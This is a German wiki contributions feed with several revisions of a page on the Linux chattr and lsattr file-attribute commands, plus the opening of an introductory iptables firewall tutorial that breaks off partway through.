<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="de">
	<id>https://wiki.ixheim.de/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Joshua.schreiner</id>
	<title>Xinux Wiki - Benutzerbeiträge [de]</title>
	<link rel="self" type="application/atom+xml" href="https://wiki.ixheim.de/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Joshua.schreiner"/>
	<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php/Spezial:Beitr%C3%A4ge/Joshua.schreiner"/>
	<updated>2026-05-14T23:02:05Z</updated>
	<subtitle>Benutzerbeiträge</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://wiki.ixheim.de/index.php?title=Chattr&amp;diff=18810</id>
		<title>Chattr</title>
		<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=Chattr&amp;diff=18810"/>
		<updated>2019-10-30T14:47:33Z</updated>

		<summary type="html">&lt;p&gt;Joshua.schreiner: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== chattr ==&lt;br /&gt;
&lt;br /&gt;
chattr (change attribute) erlaubt es Attribute auf Ordner oder Dateien zu setzen &lt;br /&gt;
dies kann z.b. genutzt werden um eine Datei unveränderbar zu machen das sie &lt;br /&gt;
nicht gelöscht oder geändet werden kann &lt;br /&gt;
&lt;br /&gt;
ein Attribut wird gesetzt mit&lt;br /&gt;
 &lt;br /&gt;
 chattr [Parameter] +''Attribut Dateiname'' &lt;br /&gt;
&lt;br /&gt;
endfernt wird ein Attribut mit &lt;br /&gt;
&lt;br /&gt;
  chattr [Parameter] -ATTRIBUT DATEI&lt;br /&gt;
&lt;br /&gt;
um sich die Attribute der Dateien anzuschauen &lt;br /&gt;
&lt;br /&gt;
 lsattr ''Dateiname''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Einige Attribute ==&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|A&lt;br /&gt;
|Bei Dateien mit diesem Attribut wird das Datum des letzten Zugriffes nicht gespeichert. &lt;br /&gt;
|-&lt;br /&gt;
|D&lt;br /&gt;
|wenn ein Ordner dieses Attribut besitzt und verändert wird, werden diese Veränderungen synchron auf die Festplatte geschrieben.&lt;br /&gt;
|-&lt;br /&gt;
|d &lt;br /&gt;
|Dateien mit diesem Attribut werden von dem Programm &amp;quot;dump&amp;quot; ignoriert.&lt;br /&gt;
|-&lt;br /&gt;
|i&lt;br /&gt;
|Dateien mit diesem Attribut können nicht verändert werden. Sie können nicht gelöscht oder modifiziert werden und man kann keinen harten Link (Hardlink) auf die Datei erstellen. Symbolische Links (Softlinks) sind weiterhin möglich. Dieses Attribut kann nur mit Root-Rechten gesetzt und entfernt werden.&lt;br /&gt;
|-&lt;br /&gt;
|S &lt;br /&gt;
|Wenn eine Datei dieses Attribut besitzt und verändert wird, werden diese Veränderungen synchron auf die Festplatte geschrieben.&lt;br /&gt;
|-&lt;br /&gt;
|u&lt;br /&gt;
|Wenn eine Datei mit diesem Attribut gelöscht wird, wird ihr Inhalt gespeichert, so dass ein User sie später wieder herstellen kann. Dieses Attribut hat momentan noch keine Auswirkungen auf ext2- und ext3-Dateisystemen.&lt;br /&gt;
|-&lt;br /&gt;
|x &lt;br /&gt;
|gibt an, ob eine vom Kernel gepackte Datei auch unentpackt gelesen werden kann.&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Parameter ==&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
| -R&lt;br /&gt;
|Wenn man chattr mit diesem Parameter auf einen Ordner anwendet, werden alle Unterordner und Dateien rekursiv mit dem gewählten Attribut versehen bzw. das Attribut entfernt.&lt;br /&gt;
|-&lt;br /&gt;
| -V&lt;br /&gt;
|Dieser Paramter ist der Verbose-Modus und man erhält mehr Meldungen auf dem Screen, wenn man Dateiattribute setzt.&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Beispiele ==&lt;br /&gt;
&lt;br /&gt;
Eine Datei unveränderbar machen&lt;br /&gt;
 &lt;br /&gt;
 sudo chattr +i ''Datei''&lt;br /&gt;
&lt;br /&gt;
Alle Dateien in einem Ordner rekursiv unveränderbar machen:&lt;br /&gt;
 &lt;br /&gt;
sudo chattr -R +i ''Ordner''&lt;br /&gt;
&lt;br /&gt;
Die Attribute einer Datei anzeigen: &lt;br /&gt;
 &lt;br /&gt;
 lsattr ''Datei''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Links'''&lt;br /&gt;
&lt;br /&gt;
https://wiki.ubuntuusers.de/chattr/&lt;/div&gt;</summary>
		<author><name>Joshua.schreiner</name></author>
	</entry>
	<entry>
		<id>https://wiki.ixheim.de/index.php?title=Chattr&amp;diff=18809</id>
		<title>Chattr</title>
		<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=Chattr&amp;diff=18809"/>
		<updated>2019-10-30T14:42:19Z</updated>

		<summary type="html">&lt;p&gt;Joshua.schreiner: /* Parameter */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== chattr ==&lt;br /&gt;
&lt;br /&gt;
chattr (change attribute) erlaubt es Attribute auf Ordner oder Dateien zu setzen &lt;br /&gt;
dies kann z.b. genutzt werden um eine Datei unveränderbar zu machen das sie &lt;br /&gt;
nicht gelöscht oder geändet werden kann &lt;br /&gt;
&lt;br /&gt;
ein Attribut wird gesetzt mit&lt;br /&gt;
 &lt;br /&gt;
 chattr [Parameter] +''Attribut Dateiname'' &lt;br /&gt;
&lt;br /&gt;
endfernt wird ein Attribut mit &lt;br /&gt;
&lt;br /&gt;
  chattr [Parameter] -ATTRIBUT DATEI&lt;br /&gt;
&lt;br /&gt;
um sich die Attribute der Dateien anzuschauen &lt;br /&gt;
&lt;br /&gt;
 lsattr ''Dateiname''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Einige Attribute ==&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|A&lt;br /&gt;
|Bei Dateien mit diesem Attribut wird das Datum des letzten Zugriffes nicht gespeichert. &lt;br /&gt;
|-&lt;br /&gt;
|D&lt;br /&gt;
|wenn ein Ordner dieses Attribut besitzt und verändert wird, werden diese Veränderungen synchron auf die Festplatte geschrieben.&lt;br /&gt;
|-&lt;br /&gt;
|d &lt;br /&gt;
|Dateien mit diesem Attribut werden von dem Programm &amp;quot;dump&amp;quot; ignoriert.&lt;br /&gt;
|-&lt;br /&gt;
|i&lt;br /&gt;
|Dateien mit diesem Attribut können nicht verändert werden. Sie können nicht gelöscht oder modifiziert werden und man kann keinen harten Link (Hardlink) auf die Datei erstellen. Symbolische Links (Softlinks) sind weiterhin möglich. Dieses Attribut kann nur mit Root-Rechten gesetzt und entfernt werden.&lt;br /&gt;
|-&lt;br /&gt;
|S &lt;br /&gt;
|Wenn eine Datei dieses Attribut besitzt und verändert wird, werden diese Veränderungen synchron auf die Festplatte geschrieben.&lt;br /&gt;
|-&lt;br /&gt;
|u&lt;br /&gt;
|Wenn eine Datei mit diesem Attribut gelöscht wird, wird ihr Inhalt gespeichert, so dass ein User sie später wieder herstellen kann. Dieses Attribut hat momentan noch keine Auswirkungen auf ext2- und ext3-Dateisystemen.&lt;br /&gt;
|-&lt;br /&gt;
|x &lt;br /&gt;
|gibt an, ob eine vom Kernel gepackte Datei auch unentpackt gelesen werden kann.&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Parameter ==&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
| -R&lt;br /&gt;
|Wenn man chattr mit diesem Parameter auf einen Ordner anwendet, werden alle Unterordner und Dateien rekursiv mit dem gewählten Attribut versehen bzw. das Attribut entfernt.&lt;br /&gt;
|-&lt;br /&gt;
| -V&lt;br /&gt;
|Dieser Paramter ist der Verbose-Modus und man erhält mehr Meldungen auf dem Screen, wenn man Dateiattribute setzt.&lt;br /&gt;
|}&lt;/div&gt;</summary>
		<author><name>Joshua.schreiner</name></author>
	</entry>
	<entry>
		<id>https://wiki.ixheim.de/index.php?title=Chattr&amp;diff=18808</id>
		<title>Chattr</title>
		<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=Chattr&amp;diff=18808"/>
		<updated>2019-10-30T14:41:56Z</updated>

		<summary type="html">&lt;p&gt;Joshua.schreiner: /* Parameter */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== chattr ==&lt;br /&gt;
&lt;br /&gt;
chattr (change attribute) erlaubt es Attribute auf Ordner oder Dateien zu setzen &lt;br /&gt;
dies kann z.b. genutzt werden um eine Datei unveränderbar zu machen das sie &lt;br /&gt;
nicht gelöscht oder geändet werden kann &lt;br /&gt;
&lt;br /&gt;
ein Attribut wird gesetzt mit&lt;br /&gt;
 &lt;br /&gt;
 chattr [Parameter] +''Attribut Dateiname'' &lt;br /&gt;
&lt;br /&gt;
endfernt wird ein Attribut mit &lt;br /&gt;
&lt;br /&gt;
  chattr [Parameter] -ATTRIBUT DATEI&lt;br /&gt;
&lt;br /&gt;
um sich die Attribute der Dateien anzuschauen &lt;br /&gt;
&lt;br /&gt;
 lsattr ''Dateiname''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Einige Attribute ==&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|A&lt;br /&gt;
|Bei Dateien mit diesem Attribut wird das Datum des letzten Zugriffes nicht gespeichert. &lt;br /&gt;
|-&lt;br /&gt;
|D&lt;br /&gt;
|wenn ein Ordner dieses Attribut besitzt und verändert wird, werden diese Veränderungen synchron auf die Festplatte geschrieben.&lt;br /&gt;
|-&lt;br /&gt;
|d &lt;br /&gt;
|Dateien mit diesem Attribut werden von dem Programm &amp;quot;dump&amp;quot; ignoriert.&lt;br /&gt;
|-&lt;br /&gt;
|i&lt;br /&gt;
|Dateien mit diesem Attribut können nicht verändert werden. Sie können nicht gelöscht oder modifiziert werden und man kann keinen harten Link (Hardlink) auf die Datei erstellen. Symbolische Links (Softlinks) sind weiterhin möglich. Dieses Attribut kann nur mit Root-Rechten gesetzt und entfernt werden.&lt;br /&gt;
|-&lt;br /&gt;
|S &lt;br /&gt;
|Wenn eine Datei dieses Attribut besitzt und verändert wird, werden diese Veränderungen synchron auf die Festplatte geschrieben.&lt;br /&gt;
|-&lt;br /&gt;
|u&lt;br /&gt;
|Wenn eine Datei mit diesem Attribut gelöscht wird, wird ihr Inhalt gespeichert, so dass ein User sie später wieder herstellen kann. Dieses Attribut hat momentan noch keine Auswirkungen auf ext2- und ext3-Dateisystemen.&lt;br /&gt;
|-&lt;br /&gt;
|x &lt;br /&gt;
|gibt an, ob eine vom Kernel gepackte Datei auch unentpackt gelesen werden kann.&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Parameter ==&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
| -r&lt;br /&gt;
|Wenn man chattr mit diesem Parameter auf einen Ordner anwendet, werden alle Unterordner und Dateien rekursiv mit dem gewählten Attribut versehen bzw. das Attribut entfernt.&lt;br /&gt;
|-&lt;br /&gt;
| -v&lt;br /&gt;
|Dieser Paramter ist der Verbose-Modus und man erhält mehr Meldungen auf dem Screen, wenn man Dateiattribute setzt.&lt;br /&gt;
|}&lt;/div&gt;</summary>
		<author><name>Joshua.schreiner</name></author>
	</entry>
	<entry>
		<id>https://wiki.ixheim.de/index.php?title=Chattr&amp;diff=18807</id>
		<title>Chattr</title>
		<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=Chattr&amp;diff=18807"/>
		<updated>2019-10-30T14:41:36Z</updated>

		<summary type="html">&lt;p&gt;Joshua.schreiner: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== chattr ==&lt;br /&gt;
&lt;br /&gt;
chattr (change attribute) erlaubt es Attribute auf Ordner oder Dateien zu setzen &lt;br /&gt;
dies kann z.b. genutzt werden um eine Datei unveränderbar zu machen das sie &lt;br /&gt;
nicht gelöscht oder geändet werden kann &lt;br /&gt;
&lt;br /&gt;
ein Attribut wird gesetzt mit&lt;br /&gt;
 &lt;br /&gt;
 chattr [Parameter] +''Attribut Dateiname'' &lt;br /&gt;
&lt;br /&gt;
endfernt wird ein Attribut mit &lt;br /&gt;
&lt;br /&gt;
  chattr [Parameter] -ATTRIBUT DATEI&lt;br /&gt;
&lt;br /&gt;
um sich die Attribute der Dateien anzuschauen &lt;br /&gt;
&lt;br /&gt;
 lsattr ''Dateiname''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Einige Attribute ==&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|A&lt;br /&gt;
|Bei Dateien mit diesem Attribut wird das Datum des letzten Zugriffes nicht gespeichert. &lt;br /&gt;
|-&lt;br /&gt;
|D&lt;br /&gt;
|wenn ein Ordner dieses Attribut besitzt und verändert wird, werden diese Veränderungen synchron auf die Festplatte geschrieben.&lt;br /&gt;
|-&lt;br /&gt;
|d &lt;br /&gt;
|Dateien mit diesem Attribut werden von dem Programm &amp;quot;dump&amp;quot; ignoriert.&lt;br /&gt;
|-&lt;br /&gt;
|i&lt;br /&gt;
|Dateien mit diesem Attribut können nicht verändert werden. Sie können nicht gelöscht oder modifiziert werden und man kann keinen harten Link (Hardlink) auf die Datei erstellen. Symbolische Links (Softlinks) sind weiterhin möglich. Dieses Attribut kann nur mit Root-Rechten gesetzt und entfernt werden.&lt;br /&gt;
|-&lt;br /&gt;
|S &lt;br /&gt;
|Wenn eine Datei dieses Attribut besitzt und verändert wird, werden diese Veränderungen synchron auf die Festplatte geschrieben.&lt;br /&gt;
|-&lt;br /&gt;
|u&lt;br /&gt;
|Wenn eine Datei mit diesem Attribut gelöscht wird, wird ihr Inhalt gespeichert, so dass ein User sie später wieder herstellen kann. Dieses Attribut hat momentan noch keine Auswirkungen auf ext2- und ext3-Dateisystemen.&lt;br /&gt;
|-&lt;br /&gt;
|x &lt;br /&gt;
|gibt an, ob eine vom Kernel gepackte Datei auch unentpackt gelesen werden kann.&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Parameter ==&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-r&lt;br /&gt;
|Wenn man chattr mit diesem Parameter auf einen Ordner anwendet, werden alle Unterordner und Dateien rekursiv mit dem gewählten Attribut versehen bzw. das Attribut entfernt.&lt;br /&gt;
|-&lt;br /&gt;
|-v&lt;br /&gt;
|Dieser Paramter ist der Verbose-Modus und man erhält mehr Meldungen auf dem Screen, wenn man Dateiattribute setzt.&lt;br /&gt;
|}&lt;/div&gt;</summary>
		<author><name>Joshua.schreiner</name></author>
	</entry>
	<entry>
		<id>https://wiki.ixheim.de/index.php?title=Chattr&amp;diff=18806</id>
		<title>Chattr</title>
		<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=Chattr&amp;diff=18806"/>
		<updated>2019-10-30T14:38:56Z</updated>

		<summary type="html">&lt;p&gt;Joshua.schreiner: /* Wichtigste Attribute */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== chattr ==&lt;br /&gt;
&lt;br /&gt;
chattr (change attribute) erlaubt es Attribute auf Ordner oder Dateien zu setzen &lt;br /&gt;
dies kann z.b. genutzt werden um eine Datei unveränderbar zu machen das sie &lt;br /&gt;
nicht gelöscht oder geändet werden kann &lt;br /&gt;
&lt;br /&gt;
ein Attribut wird gesetzt mit&lt;br /&gt;
 &lt;br /&gt;
 chattr [Parameter] +''Attribut Dateiname'' &lt;br /&gt;
&lt;br /&gt;
endfernt wird ein Attribut mit &lt;br /&gt;
&lt;br /&gt;
  chattr [Parameter] -ATTRIBUT DATEI&lt;br /&gt;
&lt;br /&gt;
um sich die Attribute der Dateien anzuschauen &lt;br /&gt;
&lt;br /&gt;
 lsattr ''Dateiname''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Einige Attribute ==&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|A&lt;br /&gt;
|Bei Dateien mit diesem Attribut wird das Datum des letzten Zugriffes nicht gespeichert. &lt;br /&gt;
|-&lt;br /&gt;
|D&lt;br /&gt;
|wenn ein Ordner dieses Attribut besitzt und verändert wird, werden diese Veränderungen synchron auf die Festplatte geschrieben.&lt;br /&gt;
|-&lt;br /&gt;
|d &lt;br /&gt;
|Dateien mit diesem Attribut werden von dem Programm &amp;quot;dump&amp;quot; ignoriert.&lt;br /&gt;
|-&lt;br /&gt;
|i&lt;br /&gt;
|Dateien mit diesem Attribut können nicht verändert werden. Sie können nicht gelöscht oder modifiziert werden und man kann keinen harten Link (Hardlink) auf die Datei erstellen. Symbolische Links (Softlinks) sind weiterhin möglich. Dieses Attribut kann nur mit Root-Rechten gesetzt und entfernt werden.&lt;br /&gt;
|-&lt;br /&gt;
|S &lt;br /&gt;
|Wenn eine Datei dieses Attribut besitzt und verändert wird, werden diese Veränderungen synchron auf die Festplatte geschrieben.&lt;br /&gt;
|-&lt;br /&gt;
|u&lt;br /&gt;
|Wenn eine Datei mit diesem Attribut gelöscht wird, wird ihr Inhalt gespeichert, so dass ein User sie später wieder herstellen kann. Dieses Attribut hat momentan noch keine Auswirkungen auf ext2- und ext3-Dateisystemen.&lt;br /&gt;
|-&lt;br /&gt;
|x &lt;br /&gt;
|gibt an, ob eine vom Kernel gepackte Datei auch unentpackt gelesen werden kann.&lt;br /&gt;
|}&lt;/div&gt;</summary>
		<author><name>Joshua.schreiner</name></author>
	</entry>
	<entry>
		<id>https://wiki.ixheim.de/index.php?title=Chattr&amp;diff=18805</id>
		<title>Chattr</title>
		<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=Chattr&amp;diff=18805"/>
		<updated>2019-10-30T14:33:26Z</updated>

		<summary type="html">&lt;p&gt;Joshua.schreiner: /* Wichtigste Attribute */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== chattr ==&lt;br /&gt;
&lt;br /&gt;
chattr (change attribute) erlaubt es Attribute auf Ordner oder Dateien zu setzen &lt;br /&gt;
dies kann z.b. genutzt werden um eine Datei unveränderbar zu machen das sie &lt;br /&gt;
nicht gelöscht oder geändet werden kann &lt;br /&gt;
&lt;br /&gt;
ein Attribut wird gesetzt mit&lt;br /&gt;
 &lt;br /&gt;
 chattr [Parameter] +''Attribut Dateiname'' &lt;br /&gt;
&lt;br /&gt;
endfernt wird ein Attribut mit &lt;br /&gt;
&lt;br /&gt;
  chattr [Parameter] -ATTRIBUT DATEI&lt;br /&gt;
&lt;br /&gt;
um sich die Attribute der Dateien anzuschauen &lt;br /&gt;
&lt;br /&gt;
 lsattr ''Dateiname''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Wichtigste Attribute ==&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|A&lt;br /&gt;
|Bei Dateien mit diesem Attribut wird das Datum des letzten Zugriffes nicht gespeichert. &lt;br /&gt;
|-&lt;br /&gt;
|D&lt;br /&gt;
|wenn ein Ordner dieses Attribut besitzt und verändert wird, werden diese Veränderungen synchron auf die Festplatte geschrieben.&lt;br /&gt;
|}&lt;/div&gt;</summary>
		<author><name>Joshua.schreiner</name></author>
	</entry>
	<entry>
		<id>https://wiki.ixheim.de/index.php?title=Chattr&amp;diff=18804</id>
		<title>Chattr</title>
		<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=Chattr&amp;diff=18804"/>
		<updated>2019-10-30T14:26:09Z</updated>

		<summary type="html">&lt;p&gt;Joshua.schreiner: Die Seite wurde neu angelegt: „ == chattr ==  chattr (change attribute) erlaubt es Attribute auf Ordner oder Dateien zu setzen  dies kann z.b. genutzt werden um eine Datei unveränderbar zu…“&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== chattr ==&lt;br /&gt;
&lt;br /&gt;
chattr (change attribute) erlaubt es Attribute auf Ordner oder Dateien zu setzen &lt;br /&gt;
dies kann z.b. genutzt werden um eine Datei unveränderbar zu machen das sie &lt;br /&gt;
nicht gelöscht oder geändet werden kann &lt;br /&gt;
&lt;br /&gt;
ein Attribut wird gesetzt mit&lt;br /&gt;
 &lt;br /&gt;
 chattr [Parameter] +''Attribut Dateiname'' &lt;br /&gt;
&lt;br /&gt;
endfernt wird ein Attribut mit &lt;br /&gt;
&lt;br /&gt;
  chattr [Parameter] -ATTRIBUT DATEI&lt;br /&gt;
&lt;br /&gt;
um sich die Attribute der Dateien anzuschauen &lt;br /&gt;
&lt;br /&gt;
 lsattr ''Dateiname''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Wichtigste Attribute ==&lt;br /&gt;
&lt;br /&gt;
A ----&amp;gt; Bei Dateien mit diesem Attribut wird das Datum des letzten Zugriffes nicht gespeichert.&lt;br /&gt;
D ----&amp;gt; Wenn ein Ordner dieses Attribut besitzt und verändert wird, werden diese Veränderungen synchron auf die Festplatte geschrieben.&lt;/div&gt;</summary>
		<author><name>Joshua.schreiner</name></author>
	</entry>
	<entry>
		<id>https://wiki.ixheim.de/index.php?title=IPTables_-_from_scratch&amp;diff=18675</id>
		<title>IPTables - from scratch</title>
		<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=IPTables_-_from_scratch&amp;diff=18675"/>
		<updated>2019-10-10T14:14:18Z</updated>

		<summary type="html">&lt;p&gt;Joshua.schreiner: /* Logging */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Die Verwendung von Firewalls mit iptables==&lt;br /&gt;
&lt;br /&gt;
Der Linux-Kernel enthält fortgeschrittene Tools für Packet-Filtering, der Prozess für die Kontrolle von Netzwerkpaketen bei ihrem Versuch einzudringen, durch und aus dem System hinaus zu dringen. Kernels vor der 2.4 Version konnten Pakete mit ipchains manipulieren, die Listen von Regeln verwendeten, die für Pakete in jeder Phase des Filterungsprozesses angewandt werden. Die Einführung des 2.4-Kernels hat iptables mit sich gebracht, die den ipchains gleichen, aber deren Wirkungsbereich und Kontrollmöglichkeiten bei der Filterung von Paketen erweitern.&lt;br /&gt;
&lt;br /&gt;
==iptables Allgemein==&lt;br /&gt;
&lt;br /&gt;
Iptables beinhaltet das englische Wort tables, was für Tabellen steht, und genauso kann man es sich auch vorstellen, denn in seinen  3 Tabellen sammeln sich die Ketten in denen Regeln zum Kontrollieren, Manipulieren oder Extrahieren von Paketen angegeben werden.&lt;br /&gt;
&lt;br /&gt;
===Tabellen===&lt;br /&gt;
Wie Pakete verarbeitet werden wird schon in den Tabellen vorgegeben. iptables besitzt standardmäßig drei Tabellen: '''mangle''', '''nat''' und '''filter'''.&lt;br /&gt;
&lt;br /&gt;
Die Tabelle '''mangle''' (übersetzt: zerhauen) ermöglicht es dem Kernel, Daten im Paket-Header zu verändern.&lt;br /&gt;
&lt;br /&gt;
'''NAT''' wird benutzt um interne und externe IP-Adressen zu übersetzen (= '''N'''etwork '''A'''dress '''T'''ranslation). Regeln in dieser Tabelle ändern die IP und/oder den Port des Ziels oder Quelle.&lt;br /&gt;
&lt;br /&gt;
Die Tabelle '''filter''' prüft alle für die Firewall ankommenden Pakete und entscheidet ob sie durchgelassen oder geblockt werden.&lt;br /&gt;
 &lt;br /&gt;
Jede dieser Tabellen besitzt nun mehrere Ketten:&lt;br /&gt;
:'''mangle''' (Paketmanipulationen): enthält alle Ketten&lt;br /&gt;
:'''nat''' (Network Adress Translation): enthält die Ketten PREROUTING, OUTPUT und POSTROUTING&lt;br /&gt;
:'''filter''' (Paketfilter): enthält die Ketten FORWARD, INPUT und OUTPUT&lt;br /&gt;
&lt;br /&gt;
===Ketten===&lt;br /&gt;
Die Ketten sind eine Sammlung von Regeln. D.h. das jede Kette mehrere Regeln besitzen kann um ein Paket durchzulassen oder zu blockieren. Es sind fünf Typen von Standardketten vorhanden. Manche dieser Ketten werden von allen Paketen und einige nur, je nachdem welches Ziel sie haben, durchlaufen. Man könnte auch sagen die Ketten unterscheiden '''wo''' welche Regeln angewendet werden. Die Regeln einer Kette werden nacheinander abgearbeitet und wenn eine zutrifft, ist die Bearbeitung in dieser Kette beendet (es gibt Ausnahmen):&lt;br /&gt;
&lt;br /&gt;
*'''PREROUTING''': alle Pakete kommen hier durch bevor eine Routing-Entscheidung getroffen wird&lt;br /&gt;
*'''FORWARD''': für alle Pakete, die von der einen zu einer anderen Netzwerkschnittstelle weitergeleitet werden - also keine Pakete die an einen lokalen Dienst gerichtet sind &lt;br /&gt;
*'''INPUT''': für Pakete die über eine Schnittstelle hereinkommen und einen Dienst auf dem Rechner ansprechen&lt;br /&gt;
*'''OUTPUT''': für die über eine Schnittstelle herausgehenden Pakete, die von einem lokalen Dienst kommen &lt;br /&gt;
*'''POSTROUTING''': alle Pakete kommen am Ende der Verarbeitung hier durch&lt;br /&gt;
&lt;br /&gt;
===Regeln===&lt;br /&gt;
&lt;br /&gt;
Mit einer Regel wird entschieden was mit einem Paket passieren soll. Jede besitzt bestimmte Parameter nach denen sie überprüft ob die Informationen eines Paketes auf sie zutreffen. Wenn die Parameter zutreffend sind, wird das Paket meist an ein neues Ziel verwiesen oder es wird eine Methode angewandt. Für die Bearbeitung der Pakete gibt es mehrere Ziele und Methoden. Häufig benutzte sind: &lt;br /&gt;
&lt;br /&gt;
*'''ACCEPT''': das Paket kann passieren&lt;br /&gt;
*'''REJECT''': das Paket wird zurückgewiesen und ein Fehlerpaket wird gesendet&lt;br /&gt;
*'''LOG''': schreibt einen Eintrag in die syslog&lt;br /&gt;
*'''DROP''': das Paket wird ignoriert und keine Antwort gesendet&lt;br /&gt;
*'''REDIRECT''': die Ziel-Adresse des Paketes wird hiermit so verändert, dass es zum lokalen Rechner gesendet wird&lt;br /&gt;
*'''MASQUERADE''': die Quell-Adresse des Paketes wird durch die IP-Adresse der Schnittstelle ersetzt, auf dem es den Rechner verlässt&lt;br /&gt;
*'''SNAT'''&lt;br /&gt;
*'''DNAT'''&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Somit funktioniert iptables wie eine Art Sammlung von Schablonen die nacheinander auf ein Paket abgebildet werden und bei einem Treffer eine bestimmte Aktion auf das Paket ausführen. Falls keine der Schablonen passen sollte wird eine Standard Aktion ausgeführt die für alle Pakete gilt die nicht auf eine Schablone passen.&lt;br /&gt;
&lt;br /&gt;
Konzept-Bild&lt;br /&gt;
&lt;br /&gt;
[[file:iptables-konzept.jpeg|750px]]&lt;br /&gt;
&lt;br /&gt;
===Syntax Allgemein===&lt;br /&gt;
&lt;br /&gt;
Wie schon zu erwarten bedient man iptables mit dem Befehl '''iptables'''. Folgende Dinge sind vorab zu beachten:&lt;br /&gt;
&lt;br /&gt;
Die Momentan in der '''filter''' Tabelle gesetzten Ketten und Regeln kann man sich mit &lt;br /&gt;
 root@hutze:~# iptables -L&lt;br /&gt;
ausgeben lassen, wobei man die Ausgabe noch mit den Operanden&lt;br /&gt;
 -n    # für numerical&lt;br /&gt;
 -v    # für verbose&lt;br /&gt;
erweitern kann.&lt;br /&gt;
&lt;br /&gt;
Dabei ist es wichtig zu bemerken das jede iptables zeile  ohne '''-t''' option von einem '''-t filter''' ausgeht.&lt;br /&gt;
Was bedeutet das es die Filter Tabelle geschrieben wird.&lt;br /&gt;
Um die anderen Tabellen zu schreiben braucht man '''-t nat''' und '''-t mangle'''&lt;br /&gt;
&lt;br /&gt;
Die 3 Tabellen von iptables spricht man jeweils mit&lt;br /&gt;
 iptables ['''-t filter''']&lt;br /&gt;
 iptables '''-t nat'''&lt;br /&gt;
 iptables '''-t mangle'''&lt;br /&gt;
an.&lt;br /&gt;
&lt;br /&gt;
Jeder dieser Tabellen Angaben folgt für gewöhnlich eine Kette. Diese sind: '''INPUT''' '''OUTPUT''' und '''FORWARD''' sowie ausschließlich für ''nat'' und ''mangle'' auch '''PREROUTING''' und '''POSTROUTING'''. Und müssen mit dem davor stehenden Operanden '''-A''' ( '''A'''ppend - englisch für Anhängen )  definiert werden.&lt;br /&gt;
&lt;br /&gt;
Beispiele:&lt;br /&gt;
 iptables -A '''INPUT'''&lt;br /&gt;
 iptables -t nat -A '''POSTROUTING'''&lt;br /&gt;
&lt;br /&gt;
Wenn man also Regeln aufstellen will muss man immer die Tabelle und das dazugehörige Kettenglied übergeben, damit der Router genau weiß was wo zu tun ist.&lt;br /&gt;
&lt;br /&gt;
Die Tabellen und Regeln von iptables könnte man theoretisch auch alle einzeln nacheinander in der Konsole eingeben was aber nicht ganz Sinn der Sache ist. Also bedienen wir uns für unsere Firewall einem simplen Bash-Skript.&lt;br /&gt;
&lt;br /&gt;
==Positionierung der Firewall vor Ubuntu 16.04==&lt;br /&gt;
&lt;br /&gt;
Eine Firewall kann man unter Linux ganz einfach mit einem vi-Dokument beginnen. Damit die daraus entstehende Firewall auch ausgeführt wird müssen wir es in den entsprechenden Verzeichnissen vermerken. Das Skript selbst sollte nach '''/etc/init.d/''' mit einem '''softlink''' mit dem '''prefix &amp;quot;S99&amp;quot;''' in '''/etc/rc2.d''' damit es beim Starten automatisch ausgeführt wird.&lt;br /&gt;
